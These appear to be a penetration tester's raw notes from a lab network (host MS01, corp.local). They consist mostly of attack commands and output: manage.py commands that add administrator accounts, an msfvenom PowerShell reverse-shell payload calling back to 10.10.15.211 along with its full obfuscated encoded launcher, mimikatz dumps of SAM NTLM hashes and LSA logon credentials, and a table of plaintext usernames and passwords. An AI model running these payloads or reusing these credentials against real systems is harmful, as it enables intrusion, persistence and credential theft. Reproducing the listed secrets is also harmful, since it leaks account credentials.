Machine MS01 172.16.1.30

LOOT from previous machine ^72bb34

User login: admin User password: Zaq12wsx!

net user /add libre TryHarder.1234@123 net localgroup administrators libre /add

proxychains python3 manage.py -u admin -t http://172.16.1.30 -p Zaq12wsx! -c “net user /add ipsec TryHarder.1234” proxychains python3 manage.py -u admin -t http://172.16.1.30 -p Zaq12wsx! -c “net localgroup administrators ipsec /add” proxychains xfreerdp /u:ipsec  /v:172.16.1.30 /p: TryHarder.1234

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.15.211 LPORT=80 R

powershell.exe -nop -w hidden -noni -ep bypass ”&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((‘H4sIANQ5LmQ{1}A5VVXWvjOBR9z6+4BO/WpolwAgtDocNmPZ2l0J0J4+70IQSqyDeNt4qUleQmoc1/X8mWP9K0zI4JsaV7dXR07pG0LAQzuRTwJ5rhHS4Yz1EY6D33wD7BlsElfMHt8OviH2QGhrf7DX6ha7Sdhtj8pMyvk8nfGj/hkhbcJAozG8kp1{0}YiMKrAJmuq5G5PXmXY/k5Pnds79JY1{0}Y3corItyw7K+JQqug6r71lqV{1}4e5kEi12sqssF’+‘{0}b6o5k+JV5ye5FVzSrOyNPKaSDLUGL8BaZgVHR/D3MIIqJV9{1}WE8DQ/wX+otcZP2oDFbjyrE81wYFKjt4lu7t95o41VLJHtFocss2Nz5j/iE+HUa0ocq4Wf28ZdQX6LKTN2EMN8b{1}VcUIKyKH98gqfEKl8ZRvA90p+Fu8k6mfqD+Kifv9RsajUX/wIfYz9yrttFFI145qhUys{0}9Kyz1JsyVWlqbg5m/R9JTrMtOZpDfYOOWSFys2epHVq6OcfBEvrJ{0}yEz8GtRT/AkGqYHY35hmtpMEFl8m’+‘XOqMHvlOcZdaZL’+‘KOcLyh7nUfQGHTIpzMo51g2a6Ldl{1}UTB+aBvuB6N+55NF6{0}RqV1lV8bZYm9wNp8’+‘H7u2MGBMyju3z8stzfPBKo8jqcDgzuDMEBZOZc/nF{0}SRNr’+‘q8jp/4fLifs31m7yq2GqdtQ6Qo5B1UIYbPBalNoa9k+nEOA4un{1}tYTb8Oe2z’+‘5ap{1}T{1}53hSmDd6LRG72Kn9YGQiT{1}P7K’+‘mZJaLg0kUm2kKuUkMHGTuSQN{1}i32E2bkXtwLb0cvB7mzhcGwXdggHrQNcoPiway6Jqq3ctdGJy76OZVm53O4sZBOFn8MkIbnz3OtR32W6oqyleVcgUIummOmzWppuyc8Op0jUq+2OshqpOjlWjzJR{0}{0}e7TZWW231blAOXUttVznHMAzy0nXVIr4hzcLKYwOIB{0}AcsY9gKBDiE0mvnH6Y3Vot37so/{1}Z1KaTU+Mpr3qLYrUYdlQ6aPyvK1dWiQpBHr6ppd6Yr5sm6YVgfeRX4+OOvI3iBr4UZVqjgzXMENYZSkBr4HM6’+‘m’+‘KZzZd6n/jWSlhyMypWbloh/hrAXZOSIBKiXVLJ4fTdZhXcY’+‘J40hVGL3F4LLbsFtt1z’+‘s18P/ybwvzQ8d2DXvi13rMZ17oVXMH+oPHH+w’+‘Jl{0}r9esrtWN9NXcO0F1Zq5Ka+pfy/dWZzvTe’+‘18zfVf+kkB9ek{1}AAA’)-f’x’,‘C’)))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))”

C:>systeminfo systeminfo

Host Name: MS01 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization:
Product ID: 00376-30821-30176-AA057 Original Install Date: 3/28/2018, 3:51:53 PM System Boot Time: 12/22/2022, 10:27:44 PM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 3 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 4,095 MB Available Physical Memory: 1,380 MB Virtual Memory: Max Size: 4,799 MB Virtual Memory: Available: 1,345 MB Virtual Memory: In Use: 3,454 MB Page File Location(s): C:\pagefile.sys Domain: corp.local Logon Server: N/A Hotfix(s): 8 Hotfix(s) Installed. [01]: KB3199986 [02]: KB4049065 [03]: KB4520724 [04]: KB4535680 [05]: KB4589210 [06]: KB5001402 [07]: KB5011570 [08]: KB5012596 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 172.16.1.30 [02]: fe80::467:636e:b23c:8edc Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Dumping Kerberos Tickets

PS C:\Users\ipsec\Documents> .\mimikatz.exe

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08

mimikatz # privilege::debug Privilege ‘20’ OK

mimikatz # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM

588 {0;000003e7} 1 D 30606 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary → Impersonated !

• Process Token : {0;0012bbbe} 2 F 6896664 MS01\ipsec S-1-5-21-4116505479-897374152-2296881962-1002 (14g,24p ) Primary
• Thread Token : {0;000003e7} 1 D 6973811 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (D elegation)

mimikatz # lsadump::sam Domain : MS01 SysKey : a72365a2384f0ff6ad435c166a5bbebc Local SID : S-1-5-21-4116505479-897374152-2296881962

SAMKey : 8e8ec73c9103331c928f72c2e48d31be

RID : 000001f4 (500) User : Administrator Hash NTLM: 7facdc498ed1680c4fd1448319a8c04f

RID : 000001f5 (501) User : Guest

RID : 000001f7 (503) User : DefaultAccount

RID : 000003e9 (1001) User : justalocaladmin Hash NTLM: 0b1e0d110407c303ca2c61764eb4ff1f lm - 0: a282dc039449a07bc77ecbac90e829b8 lm - 1: a912f8c50de32e24cd265771213220cc lm - 2: ab73dde0a9b0780c33ed0fae0126ded1 lm - 3: a5271ef1a16b9875c3389912bf22b28e lm - 4: 2e23b6e42e8ddfdfc490c3d7be1af5dd lm - 5: 780db03bdd8c5ceccf07e90e1dc7f88e lm - 6: c77e2224e16d95f6b72d0c38ca6e78c7 lm - 7: 77efb112c287f87c62ff8b2b9bf5724d lm - 8: ac1b73c33174641ffee05ef786577a82 lm - 9: a210cd4e30ed629a93e2256d5fb653d1 lm -10: 652920d73bf713996c48ef2dc1c65eb4 lm -11: 27d77875f34650f3287065f2cb42b58e lm -12: 52c45c5f35cdb4dea12fbabeb71a7b13 lm -13: 61c590f35b5457be7bfadc4be3120003 lm -14: cc3392e419e667fafea2ebb8becdeac3 lm -15: 9a77be2ebae2f2ad04f8cf379a2c767a lm -16: ed5a8f650a128a03d9b20a4dc5e640b1 lm -17: c0cc83f98256df93e6d0be3c7a9c1043 lm -18: 5ec5b147780569ebba15962c6af3b0b1 lm -19: 257df8fb0e3647ffd5172c0db34fba1f lm -20: d22215b62b0b08626d1ef735cbf123d6 lm -21: 16b83187ac6d30ca0b4f2b51f9c3eae2 lm -22: 4abf7dd19ff56d74f2d3a839b235ec79 lm -23: 9035dd5935df66952997473a29a32b72 ntlm- 0: 0b1e0d110407c303ca2c61764eb4ff1f ntlm- 1: 3eb47a38d9915ed44d92e813f73c1a3c ntlm- 2: b6eaa6ad675da196ea6edcc80245ef70 ntlm- 3: a0d3dd384aa4dd28b20a688b237f9008 ntlm- 4: c9b0ae650afa35fe4e23b952285d1c3f ntlm- 5: 1f9b75aa1b748c39b31c4b745c95c071 ntlm- 6: 9c01a2b05ed82b4532c76efc141c9b7d ntlm- 7: 7a68577fa40ab31a1dd9cc3ffdb7e714 ntlm- 8: 0b61202610be5950653013de65bf2a97 ntlm- 9: bf965175fad8c9a7745c30c535b1a0e5 ntlm-10: 7d58711c1ffdd7c254be28f0fbde8f8b ntlm-11: dbf3ea014a783aeeab1a2b97c42ab020 ntlm-12: 9b55ef44eb1ec0de4dc3e70b138af39c ntlm-13: a2b65fbf9a3db4dd06aad7d826baad13 ntlm-14: f44e0e9f39e78f6ec020946b8d1b7025 ntlm-15: fad1d40335ea9eebc6c0da605703d833 ntlm-16: 33ffb145017a50c09e3237cd9fe6e053 ntlm-17: 068069020be652f3906e4c87fe0b3eb3 ntlm-18: a9d41ad8fa30aa9b5eeaed5f0970a6bf ntlm-19: 061e8aef3659fd23f89ab5dc3c55afef ntlm-20: a982d7bec9ac2aa96f5a23829c14e0f4 ntlm-21: 2cd4623614bb98fcbb6a3464c88c5252 ntlm-22: 362e2a464084bbeb95d10d85e470c30e ntlm-23: 75a0029a8340a4dd341eb5ba63306ce0

RID : 000003ea (1002) User : ipsec Hash NTLM: 235b3c847d4ade90c5f5186cd23803af lm - 0: 10384b6f1388f3a6dba20b5e01e01d8b ntlm- 0: 235b3c847d4ade90c5f5186cd23803af

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1207172 (00000000:00126b84) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 4/5/2023 10:47:15 PM SID : S-1-5-90-0-2 msv : [00000003] Primary * Username : MS01$\ast Domain:CORP\ast NTLM:b0008678126a9a7143961c96161725a4\ast SHA1:570e49936ec2e700501645c102f53b64f66be28dtspkg:wdigest:\ast Username:MS01$ * Domain : CORP * Password : (null) kerberos : * Username : MS01$\ast Domain:corp.local\ast Password:4G27$HC(Pj1d0r75fV<FhyE$u3lAT7@CGiiP-si[D [jzHxtsi40iw ;]H6jh)Bm ssp : credman :

Authentication Id : 0 ; 66793 (00000000:000104e9) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 4/5/2023 10:30:45 PM SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : MS01$\ast Domain:CORP\ast NTLM:b0008678126a9a7143961c96161725a4\ast SHA1:570e49936ec2e700501645c102f53b64f66be28dtspkg:wdigest:\ast Username:MS01$ * Domain : CORP * Password : (null) kerberos : * Username : MS01$\ast Domain:corp.local\ast Password:4G27$HC(Pj1d0r75fV<FhyE$u3lAT7@CGiiP-si[D [jzHxtsi40iw ;]H6jh)Bm ssp : credman :

Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : MS01$Domain:CORPLogonServer:(null)LogonTime:4/5/202310:30:45PMSID:S-1-5-18msv:tspkg:wdigest:\ast Username:MS01$ * Domain : CORP * Password : (null) kerberos : * Username : ms01$ * Domain : CORP.LOCAL * Password : (null) ssp : credman :

Authentication Id : 0 ; 1227710 (00000000:0012bbbe) Session : RemoteInteractive from 2 User Name : ipsec Domain : MS01 Logon Server : MS01 Logon Time : 4/5/2023 10:47:15 PM SID : S-1-5-21-4116505479-897374152-2296881962-1002 msv : [00000003] Primary * Username : ipsec * Domain : MS01 * NTLM : 235b3c847d4ade90c5f5186cd23803af * SHA1 : f6efdc81f2fd6ef2a1d05183e1f9c631e952ea66 tspkg : wdigest : * Username : ipsec * Domain : MS01 * Password : (null) kerberos : * Username : ipsec * Domain : MS01 * Password : (null) ssp : credman :

Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : MS01$Domain:CORPLogonServer:(null)LogonTime:4/5/202310:30:45PMSID:S-1-5-20msv:[00000003]Primary\ast Username:MS01$ * Domain : CORP * NTLM : b0008678126a9a7143961c96161725a4 * SHA1 : 570e49936ec2e700501645c102f53b64f66be28d tspkg : wdigest : * Username : MS01$\ast Domain:CORP\ast Password:(null)kerberos:\ast Username:ms01$ * Domain : CORP.LOCAL * Password : (null) ssp : credman :

Authentication Id : 0 ; 35756 (00000000:00008bac) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 4/5/2023 10:30:45 PM SID : msv : [00000003] Primary * Username : MS01$ * Domain : CORP * NTLM : b0008678126a9a7143961c96161725a4 * SHA1 : 570e49936ec2e700501645c102f53b64f66be28d tspkg : wdigest : kerberos : ssp : credman :

Authentication Id : 0 ; 1227763 (00000000:0012bbf3) Session : RemoteInteractive from 2 User Name : ipsec Domain : MS01 Logon Server : MS01 Logon Time : 4/5/2023 10:47:15 PM SID : S-1-5-21-4116505479-897374152-2296881962-1002 msv : [00000003] Primary * Username : ipsec * Domain : MS01 * NTLM : 235b3c847d4ade90c5f5186cd23803af * SHA1 : f6efdc81f2fd6ef2a1d05183e1f9c631e952ea66 tspkg : wdigest : * Username : ipsec * Domain : MS01 * Password : (null) kerberos : * Username : ipsec * Domain : MS01 * Password : (null) ssp : credman :

Authentication Id : 0 ; 1207147 (00000000:00126b6b) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 4/5/2023 10:47:15 PM SID : S-1-5-90-0-2 msv : [00000003] Primary * Username : MS01$\ast Domain:CORP\ast NTLM:b0008678126a9a7143961c96161725a4\ast SHA1:570e49936ec2e700501645c102f53b64f66be28dtspkg:wdigest:\ast Username:MS01$ * Domain : CORP * Password : (null) kerberos : * Username : MS01$\ast Domain:corp.local\ast Password:4G27$HC(Pj1d0r75fV<FhyE$u3lAT7@CGiiP-si[D [jzHxtsi40iw ;]H6jh)Bm ssp : credman :

Authentication Id : 0 ; 67540 (00000000:000107d4) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 4/5/2023 10:30:45 PM SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : MS01$\ast Domain:CORP\ast NTLM:b0008678126a9a7143961c96161725a4\ast SHA1:570e49936ec2e700501645c102f53b64f66be28dtspkg:wdigest:\ast Username:MS01$ * Domain : CORP * Password : (null) kerberos : * Username : MS01$\ast Domain:corp.local\ast Password:4G27$HC(Pj1d0r75fV<FhyE$u3lAT7@CGiiP-si[D [jzHxtsi40iw ;]H6jh)Bm ssp : credman :

Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 4/5/2023 10:30:45 PM SID : S-1-5-19- msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman :

mimikatz #

Account

Username

Pass

Notes

Network login

ned.flanders_adm

Lefthandedyeah!

Email

ned.flanders@offshore.com

Lefty1974!

991103

0419!094Ar